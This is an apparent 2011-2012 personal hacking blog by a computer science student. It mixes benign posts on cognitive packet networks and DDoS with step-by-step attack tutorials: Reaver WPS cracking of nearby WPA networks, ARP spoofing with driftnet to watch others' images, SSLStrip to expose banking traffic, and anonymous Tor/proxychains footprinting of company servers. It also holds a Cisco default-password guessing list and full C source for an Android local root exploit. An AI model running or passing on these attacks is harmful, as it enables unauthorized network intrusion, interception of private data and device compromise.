Zer0 Security

How to crack WPA/WPA2 without a dictionary in 4-10 hours with reaver

2012-02-22T01:47:00.000Z

The reign of secure WPA/WPA2 network encryption is now over. It no longer takes decades to crack thanks to Tactical Network Solutions. Their brilliant team have found a weakness in WPA that lets an attacker bruteforce against Wifi Protected Setup (WPS) PINS in order to then recover the WPA/WPA2 key. We'll be using a tool which exploits this bug called reaver.

I will take you through how this is done on a Linux machine, specifically Ubuntu!

Using the terminal:

1. Download aircrack-ng:

sudo apt-get install aircrack-ng

2. Put Wifi adapter into monitor mode:

sudo airmon-ng start wlan0

3. Use airodump-ng to scan for WPA/WPA2 encrypted network BSSIDs:

sudo airodump-ng mon0

4. <crtl+c> after a few seconds or once a list of BSSIDs has populated, it should look like this:

The BSSIDs are listed on the left, these are the IDs for the various surrounding networks. Pick one which is WPA/WPA2 and uses a Public Shared Key (PSK).

Don't close this terminal, open up a new terminal and use this now instead.

READ STEPS 5-8 OR JUST COPY AND PASTE THIS INTO YOUR TERMINAL AND THEN SKIP TO STEP 9:

sudo apt-get install libsqlite3-dev && wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz && tar xfvz reaver-1.4.tar.gz && cd reaver-1.4/src/ && ./configure && make && sudo make install

5. Download and install libsqlite3-dev:

sudo apt-get install libsqlite3-dev

6. Download reaver:

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

7. Extract reaver tar.gz file:

tar xfvz reaver-1.4.tar.gz

8. Install reaver:

cd reaver-1.4/src/ && ./configure && make && sudo make install

9. Get cracking! Copy the BSSID you chose from the other open terminal and enter it in like this:

sudo reaver -i mon0 -b <paste BSSID here!!> -vv

-i mon0 = use the mon0 interface which is your wifi adapter in monitor mode.

-b "some BSSID" = the router to crack.

-vv = give very verbose output.

10. Now wait from around 4-10 hours as it cracks the network key!

So I hope people have found this useful. It was just meant as a walk through as opposed to a detailed look at how it all works. I also want you show you something else that will now seem completely random! One of my other passions is music and I have twin brother who is crazy talented...so check him out!

Basic Man in the Middle Attack tutorial

2012-02-01T17:55:00.003Z

In this video I show you how to perform a very basic man in the middle attack. To demonstrate the effectiveness of the attack I use Drifnet to sniff images that are on the network.

I use 2 tools from Dsniff suite in this video; Arpspoof and Driftnet.
This suite can be downloaded here.

It's important to watch this in full screen mode.

How to sniff images with driftnet and arpspoof (iPhone Example)

2011-10-23T03:28:00.001+01:00

dsniff is a suite of tools for testing the security of a network. This suite of security tools allows a user to set up multiple forms of network monitoring, and can comprise the privacy of all users on the network where dsniff tools are running.

In this example I will be showing how to use the driftnet and arpspoof tool from the dsniff suite, to view images that other people on the same network as you are viewing.

The driftnet tool is a network image sniffer, so if ran successfully you'd expect to see all images that were being received from websites etc. to computers on your network (LAN). I will be intercepting image that are being downloaded to my iPhone as I use my iPhone on google images.

I will be using Ubuntu 11.10 as my OS, but this will apply to any modern Linux distribution.

Firstly, get the latest release of dsniff from here.
Follow the instructions from the website in the above link for installation help.

Now that the dsniff suite has been successfully installed lets set up our environment properly to run it. All that is needed is that we enable ipv4 forwarding so that the computer we're running driftnet on can act as the default gateway (router) of the network. We will do this through the terminal, first we must be on the root account, so enter this in the terminal:

sudo su<ENTER PASSWORD>

Now you should be on the root account. Now we enable ipv4 port forwarding with this command:

echo "1" >/proc/sys/net/ipv4/ip_forward

Now we must perform a man-in-the-middle-attack, this means I will set up my computer to intercept connections coming from my iphone to the router, so all data from my iphone will first be sent to me and then my computer will send it off to the router. This means we can monitor all data sent back and forth if we want to. The way this is done is to trick my iphone into thinking that my computer is the router. To do this we will use the arpspoof tool.

I have determined that my iPhone's local IP address is 192.168.0.9 and my router's local IP address is 192.168.0.1.

This is what we need to type in the terminal (still as root user):

arpspoof -i wlan0 -t 192.168.0.9 192.168.0.1

The -i argument is to specify what network interface I'm using, -t is for the target (my iPhone) and this is followed by the router.

Expect output like this:

4c:f:6e:2f:44:4e 0:1f:f3:ea:ac:a2 0806 42: arp reply 192.168.0.1 is-at 4c:f:6e:2f:44:4e4c:f:6e:2f:44:4e 0:1f:f3:ea:ac:a2 0806 42: arp reply 192.168.0.1 is-at 4c:f:6e:2f:44:4e4c:f:6e:2f:44:4e 0:1f:f3:ea:ac:a2 0806 42: arp reply 192.168.0.1 is-at 4c:f:6e:2f:44:4e4c:f:6e:2f:44:4e 0:1f:f3:ea:ac:a2 0806 42: arp reply 192.168.0.1 is-at 4c:f:6e:2f:44:4e4c:f:6e:2f:44:4e 0:1f:f3:ea:ac:a2 0806 42: arp reply 192.168.0.1 is-at 4c:f:6e:2f:44:4e

This means that man-in-the-middle attack is working properly so now we can continue.

Now we just need to run the driftnet tool whilst arpspoof is still running, so we open up a new terminal and type:

sudo driftnet -i wlan0

So you should now have a screen similar to this:

All the images displayed are the images that I was viewing on my iPhone from google.

To save an image, just click on it and it will be saved in the current directory the the terminal is in.

These tools have many uses, such as finding out what your employees are really up to. I'm sure many people would really not want someone viewing every image they view online! So make sure that your network administrator (if you have one) knows about this security suite, and knows how to detect arp poisoning (if he doesn't know the term arp poisoning, get a new network administrator).

I hope this has been interesting and terrifying, happy hacking....

The Future of DDoS

2011-10-17T06:14:00.001+01:00

Distributed Denial of Services (DDoS) attacks are now way into a new era, so I'd like to just document this fact. This shift from an old to new era has come about following the great success of commercial cloud computing, such as Amazon's Elastic Compute Cloud.

Where DDoS attacks were not that accessible to the majority, they are now thanks to trusty cloud computing. Before an attacker would have to propagate a virus through a network and comprise as many machines as possible in order to provide enough strength for the attack. Whereas with cloud computing, renting a few CPU clusters and linking them for the same cause will give you an even more powerful denial of service, at half the time investment for a small fee.

The popularity of using cloud computing for DDoS attacks is very obvious and well used by the antisec community; anonymous and lulzsec. It was with Amazon's Elastic Compute Cloud that the Sony Playstation Network was taken down with an embarrassing number of repeats.

I wonder what will happen when someone manages to create a worm that targets these clouds services to use them in a DDoS attack as if they were normal machines to infect on a network. Something interesting definitely, and ironically it will be another cloud service that provides protection from these attacks.

Cloud computing is also used to defend against DDoS attacks...
Cloud security defence to protect cloud computing against HTTP-DoS and XML-DoS attacks
Cloud computing definitely stands on both sides of the fence, this does show that you can't have evil software systems, only evil people.

So we can sit back and watch as cloud services battle each other, with the traditional sides of hacker vs computer security.

It's the brute force power of cloud computing that makes it so useful for a hacker. Instead of trying to take control of many machines in order to have vast computational capabilities, the vastness can just be rented.

Some related links
Hackers Leased Cloud Computing Power to Attack
Harnessing The Cloud for Hacking
Legally Designed Cloud Computing Used for Malicious Purposes
Playstation Network Hackers used Amazon's Cloud Services to Launch their Attack
Cloud Computing used to Hacking Wireless Passwords

Cracking WPA Without a Dictionary (Aircrack-ng + WordField)

2011-09-24T02:20:00.001+01:00

Instead of using a dictionary on a WPA encrypted network, we can perform a bruteforce attack. Since this post I've written a better article on a much better bruteforce attack which will let you do this in 4-10 hours no matter how big the key is, it's here.

For key generation I will use a tool called WordField, which can be found here.

Usage of this tool is very simple:

wordfield [OPTION...] MINLENGTH [MAXLENGTH]

So running "wordfield -a -n 8 8" will output all possible alphanumeric strings which are 8 characters long.

I will be using the output from this tool as the input for aircrack-ng.

I will just assume that you know how to use aircrack-ng.

When a 4 way handshake has been saved with airodump-ng, the wpa network is now ready to crack. This is usually where a dictionary attack will be launched. But using this method, the dictionary will be generated in realtime against cracking the wpa key.

This is the command to do this,

wordfield -a -n 8 10 | aircrack-ng -b -w - *.cap

This will pipe the output from wordfield into aircrack-ng. Also, please note that this is only really effective on weak keys, unless you have a lot of computational power.

BlackBerry Unlocking

2011-07-01T02:29:00.002+01:00

Get the unlock code & instructions for your BlackBerry in 60 seconds from
http://lx.im/1dxe3?v=xOMzGPhy42dyEHSrpJzFtRTc8vB4lYu9rwPhX9kGDa4

You'll get so much more out of your phone when you unlock it, so see for yourself if you fancy it.

ubuntu

2011-06-30T12:15:00.003+01:00

I love the Ubuntu Linux operating system. Firstly it's free! Secondly, no viruses because Linux is very secure. It also requires less resources from your computer and runs a lot faster. It won't slow down over time. It's so easy to use people just have to try it out...

How to Become Anonymous Online

2011-06-27T11:13:00.000+01:00

Remaining anonymous and under the radar is essential practice for an attacker. In this article I will show the various ways this is done and demonstrate in detail the tools used to accomplish this.

Services/Tools used:

Tor

A set of virtual tunnels that make up a network to help users to have privacy and added security on the internet.

How Tor works:

A Tor Button can be added to firefox that allows the user to toggle whether their browser is using the Tor network or not.

Proxychains

This allows a user to run any program through a HTTP or SOCKS proxy, for example through the tor-socks running on your machine when Tor has been installed.

Proxychains forces all connections to run through a user defined list of proxies.

Polipo

A fast caching proxy server that can be used together with Tor network because it can connect with the SOCKS protocol.

Using them all together

Firstly download and install Tor from https://www.torproject.org/, guides on how to install correctly can be found there too.

Now download and install Polipo from http://www.pps.jussieu.fr/~jch/software/polipo/, again guides on how to install correctly can be found there too.

With Polipo running now download and install the TorButton Firefox add-on (Firefox browser must first be installed) from https://www.torproject.org/torbutton/index.html.en

Restart Firefox and now go into Tools -> Add-ons and then click the Preferences button on the TorButton add-on. Make sure the radio button for "Use the recommended proxy settings for my version of Firefox is selected.", is selected and that and the "Use Polipo" check box is ticked. Now click "Test Settings" to confirm that everything is working correctly.

So now you can click the TorButton button in your Firefox browser and you will be on the Tor network and anonymous! To test it's working further, toggle the TorButton on and click on this link to test if it's definitely on Tor: https://check.torproject.org/

Now I will show you how an attacker can use security tools in order footprint servers completely anonymously using proxychains.

Footprinting is

"the technique of gathering information about computer systems and the entities they belong to"

Firstly add the Tor proxy address running on your machine to proxy list proxychains uses.

Now we want to resolve the IP of the target anonymously. To do we use a tool called tor-resolve. At a command line on a machine with Tor running enter

tor-resolve <target>

This will output the resolved IP address of the target server.

Now we will use nmap through proxychains to probe the target anonymously. So at the command line enter:

proxychains nmap -sT -n -v -PN <target ip>

This will take some time to complete, in order to speed things up add -p followed by port numbers you wish to probe separated by commas.

Now the attacker has successfully footprinted a companies server with them having no idea who he is! Now that the attacker knows what services are running on the target he will know if any of them are vulnerable to exploitation. He can now use Tor through his browser to exploit any vulnerabilities he has found or he can run his own exploits through proxychains, remaining anonymous throughout.

Metasploit can also be run through proxychains allowing an attacker to have a complete arsenal of attacks and still remaining unseen.

Break SSL with SSLStrip

2011-06-02T01:29:00.000+01:00

Whilst performing a man-in-the-middle attack you can strip away the secure socket layer (SSL) using the tool called SSLStrip.
This is what you need to do to get it working on linux/unix systems.
First enable ipv4 ip forwarding and edit iptables to route tcp data to port 8070:
In the terminal enter

echo "1" > /proc/sys/net/ipv4/ip_forward <ENTER>
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8070 <ENTER>

now run sslstrip

sslstrip -l 8070

What will be happening now is that all data recieved in the man-in-the-middle attack will be stripped of SSL, leaving that data viewable by the attacker. Data protected by SSL will include banking transactions, paypal, facebook with https activated and so on.

Note that the port number 8070 can be changed with any other available port number

Why 4chan annoys me so greatly

2011-05-08T01:32:00.002+01:00

As a computer science student with special interests in computer security the news surrounded by 4chan annoys me MASSIVELY.

With headlines how they’ve hacked a website!

Complete rubbish! Honestly this is what the story always is

Distributed Denial of Service attack (DDos) = everyone on 4chan just all going on to a site at the same time and make loads of requests to get data from the site causing it to crash.

Take this analogy: (respected hacker/security expert)

I want to break into a house so I’m going to create a very cleverly crafted key which will allow me to get into the house as if I have permission.

4chan : (people that need girlfriends)

Yeh we’re hard core h4x0rs: thousands of idiots all running at the door at the same time and smashing into it heavily breaking stuff inside without actually gaining any access to the house!!!!

2nd Year Final EXAMS

2011-05-03T19:01:00.000+01:00

I won't be posting anything until after June 5th as I've got exams.

Algorithms
Logic Programming and Artificial Intelligence
Computer Graphics
System Specifications

Cognitive Packet Networks to Defend Against Denial of Service Attacks

2011-04-22T01:10:00.000+01:00

A denial of service (DoS) attack is an attempt to make a resource which is available, unavailable. This is typically done by bombarding the resource (typically a web server) with too many requests, exceeding it's capability and therefore crashing it. Just like trying to cram a 1000 people into a tiny room to perform a task which takes up a lot of room which is unavailable.

Similarly a distributed denial of service (DDoS) attack makes the same attempt but using multiple machines in order to magnify the bombardment (as seen in the picture above).

A CPN can be used to automatically detect and prevent any such attacks. As the smart packets will be observing the network, they will observe and record the routes and nodes which are being flooded with data and then change the route to fix the problem.

A paper can be found at the link below which researches this idea

An Autonomic Approach to Denial of Service Attacks

Abstract:

Denial of service attacks, viruses and worms are common tools for malicious adversarial behaviour in networks. In this paper we propose the use of our autonomic routing protocol, the Cognitive Packet Network (CPN), as a means to defend nodes from Distributed Denial of Service Attacks (DDoS), where one or more attackers generate flooding traffic from multiple sources towards selected nodes or IP addresses. We use both analytical and simulation modelling, and experiments on our CPN testbed, to evaluate the advantages and disadvantages of our approach in the presence of imperfect detection of DDoS attacks, and of false alarms.

Cognitive Packet Networks' use of Random Neural Networks (brief)

2011-04-20T16:20:00.000+01:00

In this post I will be explaining a little bit more about the use of Random Neural Networks (RNN) in implementing the reinforcement learning algorithm which the smart packets use to determine the best route through the packet network.

The random neural network (RNN) is a mathematical representation of neurons or cells which exchange spiking signals. Each cell is represented by an integer whose value rises when the cell receives an excitatory spike and drops when it receives an inhibitory spike. The spikes can originate outside the network itself, or they can come from other cells in the networks. Cells whose internal excitatory state has a positive value are allowed to send out spikes of either kind to other cells in the network according to specific cell-dependent spiking rates.

The smart packets learn which route is best to take by moving through the network when receiving an excitatory spike, if the packet makes a bad decision it is punished by receiving an inhibitory spike.

This is similar to how a human may solve a problem, by trying out different options and realising which options bares the most success, so you learn as you go along.

A Brief Introduction to Cognitive Packet Networks

2011-04-18T18:48:00.000+01:00

A Cognitive Packet Network (CPN) is a network in which the routing of the packets is delt with by the packets themselves and rely minimally on the router.

The routing algorithm is implemented by a Random Neural Network (RNN) and the Reinforcement Learning algorithm (RL), also known as RNNRL.

In a CPN there are 3 types of packets:

Smart Packet (SP).
Acknowledgement Packet (AP).
Dumb Packet (DP).

The SP figures out the best route to get from the source to the destination. It achieves this by observing the network.

The AP is sent from the destination of the SP back to the source of the SP along the route the SP took.

DPs are then sent along the acknowledged route.

Cognitive Packet Networks 3rd Year Project Proposal

2011-04-17T17:36:00.000+01:00

I've decided for my 3rd year project for my degree in Computer Science that I'm going to implement a Cognitive Packet Network and then test its resilience against common worms and other network attacks.

I'm sure my university will try and convince me to not go along with this project as they'll think it will be too much work.

So I need to write a proposal...I'm thinking of just partially implementing it before I propose it so that when they say I can't do it I'll have something to increase their confidence in me.

My future posts are going to be following my progress into my project. I'm going to implement the cognitive packet network in C.

Using Nmap online

2011-04-11T19:21:00.000+01:00

I came across this useful website when I wanted to perform a port scan but realised that I didn't have my favourite security tool Nmap at hand.

This site is for those very times

http://nmap-online.com/

You can either wait for the results to be displayed in your web browser or you they can be emailed to you.

But don't think that this provides a layer of anonymity to your probing, your ip is recorded in the process.

The Nmap Scripting Engine

2011-03-10T12:44:00.002Z

Nmap in short, is an open-source network mapping and security auditing tool.

It uses raw IP packets in novel ways to:

determine available hosts on a network;
determine the services running on those hosts;
what operating system the host is running on;
what type of packet filters/firewalls are in use.

In this post I'm going to be looking at the Nmap Scripting Engine (NSE).

It allows users to create their own script to perform an infinity of networking tasks. Because the scripts are run inside the Nmap environment it allows the scripts to maintain the same high speed and efficiency as you would expect from Nmap.

List of pre-installed scipts:

Lets just pick one script from this list, lets use whois.nse as an example.

For a host to try it on we'll use www.blogger.com.

Nmap is a command line tool and we will use the follows arguments on the host:

nmap -v --script whois.nse www.blogger.com

-v means run in verbose mode to show what is happening behind the scenes as the Nmap is running

--script whois.nse is pretty self explanatory

and www.blogger.com is the target host

Also, whois is a domain name lookup tool.

The output shows this:

By default Nmap performs a port scan but if you look under Host script results you'll see:

| whois: Record found at whois.arin.net
| netrange: 209.85.128.0 - 209.85.255.255
| netname: GOOGLE
| orgname: Google Inc.
| orgid: GOGL
| country: US stateprov: CA
| orgtechname: Google Inc
|_orgtechemail: arin-contact@google.com

Which tells the user useful information about www.blogger.com's domain name.

NSE scripts can also be used in security auditing to bruteforce, invoke dos and scan for vulnerabilities and exploit them.

Cisco router password list

2011-03-08T01:19:00.000Z

Cisco default passwords:

cisco
Cisco
cisco1
router
pix
firewall
password
gateway
internet
admin
secret
router1
rtr
switch
catalyst
secret1
root
enable
enabled
netlink
firewall
ocsic
retuor
password1
c1sc0
cisc00
c1sco
cisco2000
ciscoworks
r00t
rooter
r0ut3r
r3wt3r
rewter
root3r
rout3r
r0uter
r3wter
rewt3r
telnet
t3ln3t
access
as5300
as5800
dialin
cisco2600
cisco2500
cisco2900
cisco3500
cisco7000
cisco3600
cisco1600
cisco1700
cisco5000
cisco5500
cisco6000
cisco6500
cisco7000
cisco7200
cisco12000
cisco800
cisco700
cisco1000
catalyst1900
catalyst1800
catalyst2900
catalyst2950
catalyst3500
catalyst3900
catalyst5000
catalyst6000
catalyst5500
catalyst6500
cisco12345
cisco1234
cisco123
cisco12
p4ssw0rd
r3wt
r3w7
r007
4dm1n
adm1n
s3cr3t
s3cr37
1nt3rn3t
in73rn37
ciscovoip
voip
cisco-voip

happy hacking

At the moment

2011-03-07T20:51:00.000Z

I'm literally thinking of what posts I can make for this blog. I'm also thinking of the possible outcomes I could achieve by blogging, and ask myself why is it that I am blogging..

All important posts I will put on the Technical Archive page found here, these important posts will be on security articles and technologies.

Android Local Privilege Escalation Vulnerability

2011-03-07T19:22:00.003Z

I came across this vulnerability and exploit when I was looking for security issues with Android.

Android devices vulnerable:

Open Handset Alliance Android 2.3
Open Handset Alliance Android 2.2
Open Handset Alliance Android 2.1
Open Handset Alliance Android 1.5 CRCxx
Open Handset Alliance Android 1.5 CRBxx
Open Handset Alliance Android 1.5 CRB-43
Open Handset Alliance Android 1.5 CRB-42
Open Handset Alliance Android 1.5 COCxx
Open Handset Alliance Android 1.5 CBDxx
Open Handset Alliance Android 1.5
Open Handset Alliance Android 1.0
HTC HTC Wildfire 0

Information about the vulnerability:

This vulnerability allows attackers to elevate privileges, this then leads to a complete compromise of the device.

The exploit:

The exploit for this vulnerability has been written in c by The Android Exploid Crew. The exploit creates /system/bin/rootshell which as you would expect is a rootshell. As the user invokes hotplug

To pull out a component from a system and plug in a new one while the main power is still on.

(In this case turning turning Wifi on or off, or airplane mode etc) the exploit runs as well creating the rootshell.

Here is the source code:

#include "stdio.h"

#include "sys/socket.h"

#include "sys/types.h"

#include "linux/netlink.h"

#include "fcntl.h"
#include "errno.h"
#include "stdlib.h"
#include "string.h"
#include "string.h"
#include "unistd.h"
#include "sys/stat.h"
#include "signal.h"
#include "sys/mount.h"

void die(const char *msg)
{
 perror(msg);
 exit(errno);
}

void clear_hotplug()
{
 int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);
 write(ofd, "", 1);
 close(ofd);
}

void rootshell(char **env)
{
 char pwd[128];
 char *sh[] = {"/system/bin/sh", 0};

 setuid(0); setgid(0);
 execve(*sh, sh, env);
 die("[-] execve");
}


int main(int argc, char **argv, char **env)
{
 char buf[512], path[512];
 int ofd;
 struct sockaddr_nl snl;
 struct iovec iov = {buf, sizeof(buf)};
 struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
 int sock;
 char *basedir = NULL, *logmessage;


 /* I hope there is no LD_ bug in androids rtld :) */
 if (geteuid() == 0 && getuid() != 0)
  rootshell(env);

 if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
  die("[-] readlink");

 if (geteuid() == 0) {
  clear_hotplug();
   
  chown(path, 0, 0);
  chmod(path, 04711);
  
  chown("/sqlite_stmt_journals/su", 0, 0);
  chmod("/sqlite_stmt_journals/su", 06755);

  return 0;
 }

 printf("[*] Android local root exploid (C) The Android Exploid Crew\n");
 printf("[*] Modified by Martin Paul Eve for Wildfire Stage 1 soft-root\n");

 basedir = "/sqlite_stmt_journals";
 if (chdir(basedir) < 0) {
  basedir = "/data/local/tmp";
  if (chdir(basedir) < 0)
   basedir = strdup(getcwd(buf, sizeof(buf)));
 }
 printf("[+] Using basedir=%s, path=%s\n", basedir, path);
 printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n");

 memset(&snl, 0, sizeof(snl));
 snl.nl_pid = 1;
 snl.nl_family = AF_NETLINK;

 if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
  die("[-] socket");

 close(creat("loading", 0666));
 if ((ofd = creat("hotplug", 0644)) < 0)
  die("[-] creat");
 if (write(ofd, path , strlen(path)) < 0)
  die("[-] write");
 close(ofd);
 symlink("/proc/sys/kernel/hotplug", "data");
 snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
          "SUBSYSTEM=firmware%c"
          "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
 printf("[+] sending add message ...\n");
 if (sendmsg(sock, &msg, 0) < 0)
  die("[-] sendmsg");
 close(sock);
 printf("[*] Try to invoke hotplug now, clicking at the wireless\n"
        "[*] settings, plugin USB key etc.\n"
        "[*] You succeeded if you find /system/bin/rootshell.\n"
        "[*] GUI might hang/restart meanwhile so be patient.\n");
 return 0;
}